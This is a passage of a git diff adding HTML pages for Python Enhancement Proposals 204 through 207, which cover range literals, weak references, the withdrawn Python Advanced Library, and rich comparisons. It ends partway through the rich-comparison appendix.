List ranges

+

Ranges are sequences of numbers of a fixed stepping, often used in +for-loops. The Python for-loop is designed to iterate over a +sequence directly:

+
>>> l = ['a', 'b', 'c', 'd']
+>>> for item in l:
+...     print item
+a
+b
+c
+d
+
+
+

However, this solution is not always prudent. Firstly, problems +arise when altering the sequence in the body of the for-loop, +resulting in the for-loop skipping items. Secondly, it is not +possible to iterate over, say, every second element of the +sequence. And thirdly, it is sometimes necessary to process an +element based on its index, which is not readily available in the +above construct.

+

For these instances, and others where a range of numbers is +desired, Python provides the range builtin function, which +creates a list of numbers. The range function takes three +arguments, start, end and step. start and step are +optional, and default to 0 and 1, respectively.

+

The range function creates a list of numbers, starting at +start, with a step of step, up to, but not including end, so +that range(10) produces a list that has exactly 10 items, the +numbers 0 through 9.

+

Using the range function, the above example would look like +this:

+
>>> for i in range(len(l)):
+...     print l[i]
+a
+b
+c
+d
+
+
+

Or, to start at the second element of l and processing only +every second element from then on:

+
>>> for i in range(1, len(l), 2):
+...     print l[i]
+b
+d
+
+
+

There are several disadvantages with this approach:

+
    +
  • Clarity of purpose: Adding another function call, possibly with +extra arithmetic to determine the desired length and step of the +list, does not improve readability of the code. Also, it is +possible to “shadow” the builtin range function by supplying a +local or global variable with the same name, effectively +replacing it. This may or may not be a desired effect.
  • +
  • Efficiency: because the range function can be overridden, the +Python compiler cannot make assumptions about the for-loop, and +has to maintain a separate loop counter.
  • +
  • Consistency: There already is a syntax that is used to denote +ranges, as shown below. This syntax uses the exact same +arguments, though all optional, in the exact same way. It seems +logical to extend this syntax to ranges, to form “range +literals”.
  • +
+
+
+

Slice Indices

+

In Python, a sequence can be indexed in one of two ways: +retrieving a single item, or retrieving a range of items. +Retrieving a range of items results in a new object of the same +type as the original sequence, containing zero or more items from +the original sequence. This is done using a “range notation”:

+
>>> l[2:4]
+['c', 'd']
+
+
+

This range notation consists of zero, one or two indices separated +by a colon. The first index is the start index, the second the +end. When either is left out, they default to respectively the +start and the end of the sequence.

+

There is also an extended range notation, which incorporates +step as well. Though this notation is not currently supported +by most builtin types, if it were, it would work as follows:

+
>>> l[1:4:2]
+['b', 'd']
+
+
+

The third “argument” to the slice syntax is exactly the same as +the step argument to range(). The underlying mechanisms of the +standard, and these extended slices, are sufficiently different +and inconsistent that many classes and extensions outside of +mathematical packages do not implement support for the extended +variant. While this should be resolved, it is beyond the scope of +this PEP.

+

Extended slices do show, however, that there is already a +perfectly valid and applicable syntax to denote ranges in a way +that solve all of the earlier stated disadvantages of the use of +the range() function:

+
    +
  • It is clearer, more concise syntax, which has already proven to +be both intuitive and easy to learn.
  • +
  • It is consistent with the other use of ranges in Python +(e.g. slices).
  • +
  • Because it is built-in syntax, instead of a builtin function, it +cannot be overridden. This means both that a viewer can be +certain about what the code does, and that an optimizer will not +have to worry about range() being “shadowed”.
  • +
+
+
+

The Proposed Solution

+

The proposed implementation of range-literals combines the syntax +for list literals with the syntax for (extended) slices, to form +range literals:

+
>>> [1:10]
+[1, 2, 3, 4, 5, 6, 7, 8, 9]
+>>> [:5]
+[0, 1, 2, 3, 4]
+>>> [5:1:-1]
+[5, 4, 3, 2]
+
+
+

There is one minor difference between range literals and the slice +syntax: though it is possible to omit all of start, end and +step in slices, it does not make sense to omit end in range +literals. In slices, end would default to the end of the list, +but this has no meaning in range literals.

+
+
+

Reference Implementation

+

The proposed implementation can be found on SourceForge [1]. It +adds a new bytecode, BUILD_RANGE, that takes three arguments from +the stack and builds a list on the bases of those. The list is +pushed back on the stack.

+

The use of a new bytecode is necessary to be able to build ranges +based on other calculations, whose outcome is not known at compile +time.

+

The code introduces two new functions to listobject.c, which are +currently hovering between private functions and full-fledged API +calls.

+

PyList_FromRange() builds a list from start, end and step, +returning NULL if an error occurs. Its prototype is:

+
PyObject * PyList_FromRange(long start, long end, long step)
+
+
+

PyList_GetLenOfRange() is a helper function used to determine the +length of a range. Previously, it was a static function in +bltinmodule.c, but is now necessary in both listobject.c and +bltinmodule.c (for xrange). It is made non-static solely to avoid +code duplication. Its prototype is:

+
long PyList_GetLenOfRange(long start, long end, long step)
+
+
+
+
+

Open issues

+
    +
  • One possible solution to the discrepancy of requiring the end +argument in range literals is to allow the range syntax to +create a “generator”, rather than a list, such as the xrange +builtin function does. However, a generator would not be a +list, and it would be impossible, for instance, to assign to +items in the generator, or append to it.

    The range syntax could conceivably be extended to include tuples +(i.e. immutable lists), which could then be safely implemented +as generators. This may be a desirable solution, especially for +large number arrays: generators require very little in the way +of storage and initialization, and there is only a small +performance impact in calculating and creating the appropriate +number on request. (TBD: is there any at all? Cursory testing +suggests equal performance even in the case of ranges of length +1)

    +

    However, even if idea was adopted, would it be wise to “special +case” the second argument, making it optional in one instance of +the syntax, and non-optional in other cases ?

    +
  • +
  • Should it be possible to mix range syntax with normal list +literals, creating a single list? E.g.:
    >>> [5, 6, 1:6, 7, 9]
    +
    +
    +

    to create:

    +
    [5, 6, 1, 2, 3, 4, 5, 7, 9]
    +
    +
    +
  • +
  • How should range literals interact with another proposed new +feature, “list comprehensions”? Specifically, should it be +possible to create lists in list comprehensions? E.g.:
    >>> [x:y for x in (1, 2) y in (3, 4)]
    +
    +
    +

    Should this example return a single list with multiple ranges:

    +
    [1, 2, 1, 2, 3, 2, 2, 3]
    +
    +
    +

    Or a list of lists, like so:

    +
    [[1, 2], [1, 2, 3], [2], [2, 3]]
    +
    +
    +

    However, as the syntax and semantics of list comprehensions are +still subject of hot debate, these issues are probably best +addressed by the “list comprehensions” PEP.

    +
  • +
  • Range literals accept objects other than integers: it performs +PyInt_AsLong() on the objects passed in, so as long as the +objects can be coerced into integers, they will be accepted. +The resulting list, however, is always composed of standard +integers.

    Should range literals create a list of the passed-in type? It +might be desirable in the cases of other builtin types, such as +longs and strings:

    +
    >>> [ 1L : 2L<<64 : 2<<32L ]
    +>>> ["a":"z":"b"]
    +>>> ["a":"z":2]
    +
    +
    +

    However, this might be too much “magic” to be obvious. It might +also present problems with user-defined classes: even if the +base class can be found and a new instance created, the instance +may require additional arguments to __init__, causing the +creation to fail.

    +
  • +
  • The PyList_FromRange() and PyList_GetLenOfRange() functions need +to be classified: are they part of the API, or should they be +made private functions?
  • +
+
+ +
+

References

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0204.rst

+

Last modified: 2024-04-14 20:08:31 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0205/index.html b/pep-0205/index.html new file mode 100644 index 00000000000..8a1e70255ba --- /dev/null +++ b/pep-0205/index.html @@ -0,0 +1,553 @@ + + + + + + + + PEP 205 – Weak References | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 205 – Weak References

+
+
Author:
+
Fred L. Drake, Jr. <fred at fdrake.net>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
14-Jul-2000
+
Python-Version:
+
2.1
+
Post-History:
+
11-Jan-2001
+
+
+
+
Table of Contents +
+
+

Motivation

+

There are two basic applications for weak references which have +been noted by Python programmers: object caches and reduction of +pain from circular references.

+
+

Caches (weak dictionaries)

+

There is a need to allow objects to be maintained that represent +external state, mapping a single instance to the external +reality, where allowing multiple instances to be mapped to the +same external resource would create unnecessary difficulty +maintaining synchronization among instances. In these cases, +a common idiom is to support a cache of instances; a factory +function is used to return either a new or existing instance.

+

The difficulty in this approach is that one of two things must +be tolerated: either the cache grows without bound, or there +needs to be explicit management of the cache elsewhere in the +application. The later can be very tedious and leads to more +code than is really necessary to solve the problem at hand, +and the former can be unacceptable for long-running processes +or even relatively short processes with substantial memory +requirements.

+
    +
  • External objects that need to be represented by a single +instance, no matter how many internal users there are. This +can be useful for representing files that need to be written +back to disk in whole rather than locked & modified for +every use.
  • +
  • Objects that are expensive to create, but may be needed by +multiple internal consumers. Similar to the first case, but +not necessarily bound to external resources, and possibly +not an issue for shared state. Weak references are only +useful in this case if there is some flavor of “soft” +references or if there is a high likelihood that users of +individual objects will overlap in lifespan.
  • +
+
+
+

Circular references

+
    +
  • DOMs require a huge amount of circular (to parent & document +nodes) references, but these could be eliminated using a weak +dictionary mapping from each node to its parent. This +might be especially useful in the context of something like +xml.dom.pulldom, allowing the .unlink() operation to become +a no-op.
  • +
+

This proposal is divided into the following sections:

+
    +
  • Proposed Solution
  • +
  • Implementation Strategy
  • +
  • Possible Applications
  • +
  • Previous Weak Reference Work in Python
  • +
  • Weak References in Java
  • +
+

The full text of one early proposal is included as an appendix +since it does not appear to be available on the net.

+
+
+
+

Aspects of the Solution Space

+

There are two distinct aspects to the weak references problem:

+
    +
  • Invalidation of weak references
  • +
  • Presentation of weak references to Python code
  • +
+
+

Invalidation

+

Past approaches to weak reference invalidation have often hinged +on storing a strong reference and being able to examine all the +instances of weak reference objects, and invalidating them when +the reference count of their referent goes to one (indicating that +the reference stored by the weak reference is the last remaining +reference). This has the advantage that the memory management +machinery in Python need not change, and that any type can be +weakly referenced.

+

The disadvantage of this approach to invalidation is that it +assumes that the management of the weak references is called +sufficiently frequently that weakly-referenced objects are noticed +within a reasonably short time frame; since this means a scan over +some data structure to invalidate references, an operation which +is O(N) on the number of weakly referenced objects, this is not +effectively amortized for any single object which is weakly +referenced. This also assumes that the application is calling +into code which handles weakly-referenced objects with some +frequency, which makes weak-references less attractive for library +code.

+

An alternate approach to invalidation is that the de-allocation +code to be aware of the possibility of weak references and make a +specific call into the weak-reference management code to all +invalidation whenever an object is deallocated. This requires a +change in the tp_dealloc handler for weakly-referencable objects; +an additional call is needed at the “top” of the handler for +objects which support weak-referencing, and an efficient way to +map from an object to a chain of weak references for that object +is needed as well.

+
+
+

Presentation

+

Two ways that weak references are presented to the Python layer +have been as explicit reference objects upon which some operation +is required in order to retrieve a usable reference to the +underlying object, and proxy objects which masquerade as the +original objects as much as possible.

+

Reference objects are easy to work with when some additional layer +of object management is being added in Python; references can be +checked for liveness explicitly, without having to invoke +operations on the referents and catching some special exception +raised when an invalid weak reference is used.

+

However, a number of users favor the proxy approach simply because +the weak reference looks so much like the original object.

+
+
+
+

Proposed Solution

+

Weak references should be able to point to any Python object that +may have substantial memory size (directly or indirectly), or hold +references to external resources (database connections, open +files, etc.).

+

A new module, weakref, will contain new functions used to create +weak references. weakref.ref() will create a “weak reference +object” and optionally attach a callback which will be called when +the object is about to be finalized. weakref.mapping() will +create a “weak dictionary”. A third function, weakref.proxy(), +will create a proxy object that behaves somewhat like the original +object.

+

A weak reference object will allow access to the referenced object +if it hasn’t been collected and to determine if the object still +exists in memory. Retrieving the referent is done by calling the +reference object. If the referent is no longer alive, this will +return None instead.

+

A weak dictionary maps arbitrary keys to values, but does not own +a reference to the values. When the values are finalized, the +(key, value) pairs for which it is a value are removed from all +the mappings containing such pairs. Like dictionaries, weak +dictionaries are not hashable.

+

Proxy objects are weak references that attempt to behave like the +object they proxy, as much as they can. Regardless of the +underlying type, proxies are not hashable since their ability to +act as a weak reference relies on a fundamental mutability that +will cause failures when used as dictionary keys – even if the +proper hash value is computed before the referent dies, the +resulting proxy cannot be used as a dictionary key since it cannot +be compared once the referent has expired, and comparability is +necessary for dictionary keys. Operations on proxy objects after +the referent dies cause weakref.ReferenceError to be raised in +most cases. “is” comparisons, type(), and id() will continue to +work, but always refer to the proxy and not the referent.

+

The callbacks registered with weak references must accept a single +parameter, which will be the weak reference or proxy object +itself. The object cannot be accessed or resurrected in the +callback.

+
+
+

Implementation Strategy

+

The implementation of weak references will include a list of +reference containers that must be cleared for each weakly-referencable +object. If the reference is from a weak dictionary, +the dictionary entry is cleared first. Then, any associated +callback is called with the object passed as a parameter. Once +all callbacks have been called, the object is finalized and +deallocated.

+

Many built-in types will participate in the weak-reference +management, and any extension type can elect to do so. The type +structure will contain an additional field which provides an +offset into the instance structure which contains a list of weak +reference structures. If the value of the field is <= 0, the +object does not participate. In this case, weakref.ref(), +<weakdict>.__setitem__() and .setdefault(), and item assignment will +raise TypeError. If the value of the field is > 0, a new weak +reference can be generated and added to the list.

+

This approach is taken to allow arbitrary extension types to +participate, without taking a memory hit for numbers or other +small types.

+

Standard types which support weak references include instances, +functions, and bound & unbound methods. With the addition of +class types (“new-style classes”) in Python 2.2, types grew +support for weak references. Instances of class types are weakly +referencable if they have a base type which is weakly referencable, +the class not specify __slots__, or a slot is named __weakref__. +Generators also support weak references.

+
+
+

Possible Applications

+

PyGTK+ bindings?

+

Tkinter – could avoid circular references by using weak +references from widgets to their parents. Objects won’t be +discarded any sooner in the typical case, but there won’t be so +much dependence on the programmer calling .destroy() before +releasing a reference. This would mostly benefit long-running +applications.

+

DOM trees.

+
+
+

Previous Weak Reference Work in Python

+

Dianne Hackborn has proposed something called “virtual references”. +‘vref’ objects are very similar to java.lang.ref.WeakReference +objects, except there is no equivalent to the invalidation +queues. Implementing a “weak dictionary” would be just as +difficult as using only weak references (without the invalidation +queue) in Java. Information on this has disappeared from the Web, +but is included below as an Appendix.

+

Marc-André Lemburg’s mx.Proxy package:

+
+
+

The weakdict module by Dieter Maurer is implemented in C and +Python. It appears that the Web pages have not been updated since +Python 1.5.2a, so I’m not yet sure if the implementation is +compatible with Python 2.0.

+
+
+

PyWeakReference by Alex Shindich:

+
+
+

Eric Tiedemann has a weak dictionary implementation:

+
+
+
+
+

Weak References in Java

+

http://java.sun.com/j2se/1.3/docs/api/java/lang/ref/package-summary.html

+

Java provides three forms of weak references, and one interesting +helper class. The three forms are called “weak”, “soft”, and +“phantom” references. The relevant classes are defined in the +java.lang.ref package.

+

For each of the reference types, there is an option to add the +reference to a queue when it is invalidated by the memory +allocator. The primary purpose of this facility seems to be that +it allows larger structures to be composed to incorporate +weak-reference semantics without having to impose substantial +additional locking requirements. For instance, it would not be +difficult to use this facility to create a “weak” hash table which +removes keys and referents when a reference is no longer used +elsewhere. Using weak references for the objects without some +sort of notification queue for invalidations leads to much more +tedious implementation of the various operations required on hash +tables. This can be a performance bottleneck if deallocations of +the stored objects are infrequent.

+

Java’s “weak” references are most like Dianne Hackborn’s old vref +proposal: a reference object refers to a single Python object, +but does not own a reference to that object. When that object is +deallocated, the reference object is invalidated. Users of the +reference object can easily determine that the reference has been +invalidated, or a NullObjectDereferenceError can be raised when +an attempt is made to use the referred-to object.

+

The “soft” references are similar, but are not invalidated as soon +as all other references to the referred-to object have been +released. The “soft” reference does own a reference, but allows +the memory allocator to free the referent if the memory is needed +elsewhere. It is not clear whether this means soft references are +released before the malloc() implementation calls sbrk() or its +equivalent, or if soft references are only cleared when malloc() +returns NULL.

+

“Phantom” references are a little different; unlike weak and soft +references, the referent is not cleared when the reference is +added to its queue. When all phantom references for an object +are dequeued, the object is cleared. This can be used to keep an +object alive until some additional cleanup is performed which +needs to happen before the objects .finalize() method is called.

+

Unlike the other two reference types, “phantom” references must be +associated with an invalidation queue.

+
+
+

Appendix – Dianne Hackborn’s vref proposal (1995)

+

[This has been indented and paragraphs reflowed, but there have be +no content changes. –Fred]

+
+

Proposal: Virtual References

+

In an attempt to partly address the recurring discussion +concerning reference counting vs. garbage collection, I would like +to propose an extension to Python which should help in the +creation of “well structured” cyclic graphs. In particular, it +should allow at least trees with parent back-pointers and +doubly-linked lists to be created without worry about cycles.

+

The basic mechanism I’d like to propose is that of a “virtual +reference,” or a “vref” from here on out. A vref is essentially a +handle on an object that does not increment the object’s reference +count. This means that holding a vref on an object will not keep +the object from being destroyed. This would allow the Python +programmer, for example, to create the aforementioned tree +structure, which is automatically destroyed when it +is no longer in use – by making all of the parent back-references +into vrefs, they no longer create reference cycles which keep the +tree from being destroyed.

+

In order to implement this mechanism, the Python core must ensure +that no -real- pointers are ever left referencing objects that no +longer exist. The implementation I would like to propose involves +two basic additions to the current Python system:

+
    +
  1. A new “vref” type, through which the Python programmer creates +and manipulates virtual references. Internally, it is +basically a C-level Python object with a pointer to the Python +object it is a reference to. Unlike all other Python code, +however, it does not change the reference count of this object. +In addition, it includes two pointers to implement a +doubly-linked list, which is used below.
  2. +
  3. The addition of a new field to the basic Python object +[PyObject_Head in object.h], which is either NULL, or points to +the head of a list of all vref objects that reference it. When +a vref object attaches itself to another object, it adds itself +to this linked list. Then, if an object with any vrefs on it +is deallocated, it may walk this list and ensure that all of +the vrefs on it point to some safe value, e.g. Nothing.
  4. +
+

This implementation should hopefully have a minimal impact on the +current Python core – when no vrefs exist, it should only add one +pointer to all objects, and a check for a NULL pointer every time +an object is deallocated.

+

Back at the Python language level, I have considered two possible +semantics for the vref object –

+
+
+

Pointer semantics

+

In this model, a vref behaves essentially like a Python-level +pointer; the Python program must explicitly dereference the vref +to manipulate the actual object it references.

+

An example vref module using this model could include the +function “new”; When used as ‘MyVref = vref.new(MyObject)’, it +returns a new vref object such that MyVref.object == MyObject. +MyVref.object would then change to Nothing if +MyObject is ever deallocated.

+

For a concrete example, we may introduce some new C-style syntax:

+
    +
  • & – unary operator, creates a vref on an object, same as vref.new().
  • +
  • * – unary operator, dereference a vref, same as VrefObject.object.
  • +
+

We can then define:

+
1.     type(&MyObject) == vref.VrefType
+2.        *(&MyObject) == MyObject
+3. (*(&MyObject)).attr == MyObject.attr
+4.          &&MyObject == Nothing
+5.           *MyObject -> exception
+
+
+

Rule #4 is subtle, but comes about because we have made a vref +to (a vref with no real references). Thus the outer vref is +cleared to Nothing when the inner one inevitably disappears.

+
+
+

Proxy semantics

+

In this model, the Python programmer manipulates vref objects +just as if she were manipulating the object it is a reference +of. This is accomplished by implementing the vref so that all +operations on it are redirected to its referenced object. With +this model, the dereference operator (*) no longer makes sense; +instead, we have only the reference operator (&), and define:

+
1.  type(&MyObject) == type(MyObject)
+2.        &MyObject == MyObject
+3. (&MyObject).attr == MyObject.attr
+4.       &&MyObject == MyObject
+
+
+

Again, rule #4 is important – here, the outer vref is in fact a +reference to the original object, and -not- the inner vref. +This is because all operations applied to a vref actually apply +to its object, so that creating a vref of a vref actually +results in creating a vref of the latter’s object.

+

The first, pointer semantics, has the advantage that it would be +very easy to implement; the vref type is extremely simple, +requiring at minimum a single attribute, object, and a function to +create a reference.

+

However, I really like the proxy semantics. Not only does it put +less of a burden on the Python programmer, but it allows you to do +nice things like use a vref anywhere you would use the actual +object. Unfortunately, it would probably an extreme pain, if not +practically impossible, to implement in the current Python +implementation. I do have some thoughts, though, on how to do +this, if it seems interesting; one possibility is to introduce new +type-checking functions which handle the vref. This would +hopefully older C modules which don’t expect vrefs to simply +return a type error, until they can be fixed.

+

Finally, there are some other additional capabilities that this +system could provide. One that seems particularly interesting to +me involves allowing the Python programmer to add “destructor” +function to a vref – this Python function would be called +immediately prior to the referenced object being deallocated, +allowing a Python program to invisibly attach itself to another +object and watch for it to disappear. This seems neat, though I +haven’t actually come up with any practical uses for it, yet… :)

+

– Dianne

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0205.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0206/index.html b/pep-0206/index.html new file mode 100644 index 00000000000..12073d45293 --- /dev/null +++ b/pep-0206/index.html @@ -0,0 +1,223 @@ + + + + + + + + PEP 206 – Python Advanced Library | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 206 – Python Advanced Library

+
+
Author:
+
A.M. Kuchling <amk at amk.ca>
+
Status:
+
Withdrawn
+
Type:
+
Informational
+
Created:
+
14-Jul-2000
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Important

+

This PEP has been withdrawn.

+

×

+

+
+
+

Introduction

+

This PEP describes the Python Advanced Library, a collection of +high-quality and frequently-used third party extension modules.

+
+
+

Batteries Included Philosophy

+

The Python source distribution has long maintained the philosophy +of “batteries included” – having a rich and versatile standard +library which is immediately available, without making the user +download separate packages. This gives the Python language a head +start in many projects.

+

However, the standard library modules aren’t always the best +choices for a job. Some library modules were quick hacks +(e.g. calendar, commands), some were designed poorly and are now +near-impossible to fix (cgi), and some have been rendered obsolete +by other, more complete modules (binascii offers the same features +as the binhex, uu, base64 modules). This PEP describes a list of +third-party modules that make Python more competitive for various +application domains, forming the Python Advanced Library.

+

The deliverable is a set of scripts that will retrieve, build, and +install the packages for a particular application domain. The +Python Package Index now contains enough information to let +software automatically find packages and download them, so the +time is ripe to implement this.

+

Currently this document doesn’t suggest removing modules from +the standard library that are superseded by a third-party module. +That’s difficult to do because it entails many backward-compatibility +problems, so it’s not worth bothering with now.

+

Please suggest additional domains of interest.

+
+
+

Domain: Web tasks

+

XML parsing: ElementTree + SAX.

+

URL retrieval: libcurl? other possibilities?

+

HTML parsing: mxTidy? HTMLParser?

+

Async network I/O: Twisted

+

RDF parser: ???

+

HTTP serving: ???

+

HTTP cookie processing: ???

+

Web framework: A WSGI gateway, perhaps? Paste?

+

Graphics: PIL, Chaco.

+
+
+

Domain: Scientific Programming

+

Numeric: Numeric, SciPy

+

Graphics: PIL, Chaco.

+
+
+

Domain: Application Development

+

GUI toolkit: ???

+

Graphics: Reportlab for PDF generation.

+
+
+

Domain: Education

+

Graphics: PyGame

+
+
+

Software covered by the GNU General Public License

+

Some of these third-party modules are covered by the GNU General +Public License and the GNU Lesser General Public License. +Providing a script to download and install such packages, or even +assembling all these packages into a single tarball or CD-ROM, +shouldn’t cause any difficulties with the GPL, under the “mere +aggregation” clause of the license.

+
+
+

Open Issues

+

What other application domains are important?

+

Should this just be a set of Ubuntu or Debian packages? Compiling +things such as PyGame can be very complicated and may be too +difficult to automate.

+
+
+

Acknowledgements

+

The PEP is based on an earlier draft PEP by Moshe Zadka, titled +“2.0 Batteries Included.”

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0206.rst

+

Last modified: 2024-04-14 13:35:25 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0207/index.html b/pep-0207/index.html new file mode 100644 index 00000000000..b4804e0ff74 --- /dev/null +++ b/pep-0207/index.html @@ -0,0 +1,587 @@ + + + + + + + + PEP 207 – Rich Comparisons | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 207 – Rich Comparisons

+
+
Author:
+
Guido van Rossum <guido at python.org>, David Ascher <DavidA at ActiveState.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
25-Jul-2000
+
Python-Version:
+
2.1
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes several new features for comparisons:

+
    +
  • Allow separately overloading of <, >, <=, >=, ==, !=, both in +classes and in C extensions.
  • +
  • Allow any of those overloaded operators to return something else +besides a Boolean result.
  • +
+
+
+

Motivation

+

The main motivation comes from NumPy, whose users agree that A<B +should return an array of elementwise comparison outcomes; they +currently have to spell this as less(A,B) because A<B can only +return a Boolean result or raise an exception.

+

An additional motivation is that frequently, types don’t have a +natural ordering, but still need to be compared for equality. +Currently such a type must implement comparison and thus define +an arbitrary ordering, just so that equality can be tested.

+

Also, for some object types an equality test can be implemented +much more efficiently than an ordering test; for example, lists +and dictionaries that differ in length are unequal, but the +ordering requires inspecting some (potentially all) items.

+
+
+

Previous Work

+

Rich Comparisons have been proposed before; in particular by David +Ascher, after experience with Numerical Python:

+
+
+

It is also included below as an Appendix. Most of the material in +this PEP is derived from David’s proposal.

+
+
+

Concerns

+
    +
  1. Backwards compatibility, both at the Python level (classes using +__cmp__ need not be changed) and at the C level (extensions +defining tp_comparea need not be changed, code using +PyObject_Compare() must work even if the compared objects use +the new rich comparison scheme).
  2. +
  3. When A<B returns a matrix of elementwise comparisons, an easy +mistake to make is to use this expression in a Boolean context. +Without special precautions, it would always be true. This use +should raise an exception instead.
  4. +
  5. If a class overrides x==y but nothing else, should x!=y be +computed as not(x==y), or fail? What about the similar +relationship between < and >=, or between > and <=?
  6. +
  7. Similarly, should we allow x<y to be calculated from y>x? And +x<=y from not(x>y)? And x==y from y==x, or x!=y from y!=x?
  8. +
  9. When comparison operators return elementwise comparisons, what +to do about shortcut operators like A<B<C, A<B and C<D, +A<B or C<D?
  10. +
  11. What to do about min() and max(), the ‘in’ and ‘not in’ +operators, list.sort(), dictionary key comparison, and other +uses of comparisons by built-in operations?
  12. +
+
+
+

Proposed Resolutions

+
    +
  1. Full backwards compatibility can be achieved as follows. When +an object defines tp_compare() but not tp_richcompare(), and a +rich comparison is requested, the outcome of tp_compare() is +used in the obvious way. E.g. if “<” is requested, an exception if +tp_compare() raises an exception, the outcome is 1 if +tp_compare() is negative, and 0 if it is zero or positive. Etc.

    Full forward compatibility can be achieved as follows. When a +classic comparison is requested on an object that implements +tp_richcompare(), up to three comparisons are used: first == is +tried, and if it returns true, 0 is returned; next, < is tried +and if it returns true, -1 is returned; next, > is tried and if +it returns true, +1 is returned. If any operator tried returns +a non-Boolean value (see below), the exception raised by +conversion to Boolean is passed through. If none of the +operators tried returns true, the classic comparison fallbacks +are tried next.

    +

    (I thought long and hard about the order in which the three +comparisons should be tried. At one point I had a convincing +argument for doing it in this order, based on the behavior of +comparisons for cyclical data structures. But since that code +has changed again, I’m not so sure that it makes a difference +any more.)

    +
  2. +
  3. Any type that returns a collection of Booleans instead of a +single boolean should define nb_nonzero() to raise an exception. +Such a type is considered a non-Boolean.
  4. +
  5. The == and != operators are not assumed to be each other’s +complement (e.g. IEEE 754 floating point numbers do not satisfy +this). It is up to the type to implement this if desired. +Similar for < and >=, or > and <=; there are lots of examples +where these assumptions aren’t true (e.g. tabnanny).
  6. +
  7. The reflexivity rules are assumed by Python. Thus, the +interpreter may swap y>x with x<y, y>=x with x<=y, and may swap +the arguments of x==y and x!=y. (Note: Python currently assumes +that x==x is always true and x!=x is never true; this should not +be assumed.)
  8. +
  9. In the current proposal, when A<B returns an array of +elementwise comparisons, this outcome is considered non-Boolean, +and its interpretation as Boolean by the shortcut operators +raises an exception. David Ascher’s proposal tries to deal +with this; I don’t think this is worth the additional complexity +in the code generator. Instead of A<B<C, you can write +(A<B)&(B<C).
  10. +
  11. The min() and list.sort() operations will only use the +< operator; max() will only use the > operator. The ‘in’ and +‘not in’ operators and dictionary lookup will only use the == +operator.
  12. +
+
+
+

Implementation Proposal

+

This closely follows David Ascher’s proposal.

+
+

C API

+
    +
  • New functions:
    PyObject *PyObject_RichCompare(PyObject *, PyObject *, int)
    +
    +
    +

    This performs the requested rich comparison, returning a Python +object or raising an exception. The 3rd argument must be one of +Py_LT, Py_LE, Py_EQ, Py_NE, Py_GT or Py_GE.

    +
    int PyObject_RichCompareBool(PyObject *, PyObject *, int)
    +
    +
    +

    This performs the requested rich comparison, returning a +Boolean: -1 for exception, 0 for false, 1 for true. The 3rd +argument must be one of Py_LT, Py_LE, Py_EQ, Py_NE, Py_GT or +Py_GE. Note that when PyObject_RichCompare() returns a +non-Boolean object, PyObject_RichCompareBool() will raise an +exception.

    +
  • +
  • New typedef:
    typedef PyObject *(*richcmpfunc) (PyObject *, PyObject *, int);
    +
    +
    +
  • +
  • New slot in type object, replacing spare tp_xxx7:
    richcmpfunc tp_richcompare;
    +
    +
    +

    This should be a function with the same signature as +PyObject_RichCompare(), and performing the same comparison. +At least one of the arguments is of the type whose +tp_richcompare slot is being used, but the other may have a +different type. If the function cannot compare the particular +combination of objects, it should return a new reference to +Py_NotImplemented.

    +
  • +
  • PyObject_Compare() is changed to try rich comparisons if they +are defined (but only if classic comparisons aren’t defined).
  • +
+
+
+

Changes to the interpreter

+
    +
  • Whenever PyObject_Compare() is called with the intent of getting +the outcome of a particular comparison (e.g. in list.sort(), and +of course for the comparison operators in ceval.c), the code is +changed to call PyObject_RichCompare() or +PyObject_RichCompareBool() instead; if the C code needs to know +the outcome of the comparison, PyObject_IsTrue() is called on +the result (which may raise an exception).
  • +
  • Most built-in types that currently define a comparison will be +modified to define a rich comparison instead. (This is +optional; I’ve converted lists, tuples, complex numbers, and +arrays so far, and am not sure whether I will convert others.)
  • +
+
+
+

Classes

+
    +
  • Classes can define new special methods __lt__, __le__, __eq__, +__ne__, __gt__, __ge__ to override the corresponding operators. +(I.e., <, <=, ==, !=, >, >=. You gotta love the Fortran +heritage.) If a class defines __cmp__ as well, it is only used +when __lt__ etc. have been tried and return NotImplemented.
  • +
+
+
+ +
+

Appendix

+

Here is most of David Ascher’s original proposal (version 0.2.1, +dated Wed Jul 22 16:49:28 1998; I’ve left the Contents, History +and Patches sections out). It addresses almost all concerns +above.

+
+
+

Abstract

+

A new mechanism allowing comparisons of Python objects to return +values other than -1, 0, or 1 (or raise exceptions) is +proposed. This mechanism is entirely backwards compatible, and can +be controlled at the level of the C PyObject type or of the Python +class definition. There are three cooperating parts to the +proposed mechanism:

+
    +
  • the use of the last slot in the type object structure to store a +pointer to a rich comparison function
  • +
  • the addition of special methods for classes
  • +
  • the addition of an optional argument to the builtin cmp() +function.
  • +
+
+
+

Motivation

+

The current comparison protocol for Python objects assumes that +any two Python objects can be compared (as of Python 1.5, object +comparisons can raise exceptions), and that the return value for +any comparison should be -1, 0 or 1. -1 indicates that the first +argument to the comparison function is less than the right one, +1 +indicating the contrapositive, and 0 indicating that the two +objects are equal. While this mechanism allows the establishment +of an order relationship (e.g. for use by the sort() method of list +objects), it has proven to be limited in the context of Numeric +Python (NumPy).

+

Specifically, NumPy allows the creation of multidimensional +arrays, which support most of the numeric operators. Thus:

+
x = array((1,2,3,4))        y = array((2,2,4,4))
+
+
+

are two NumPy arrays. While they can be added elementwise,:

+
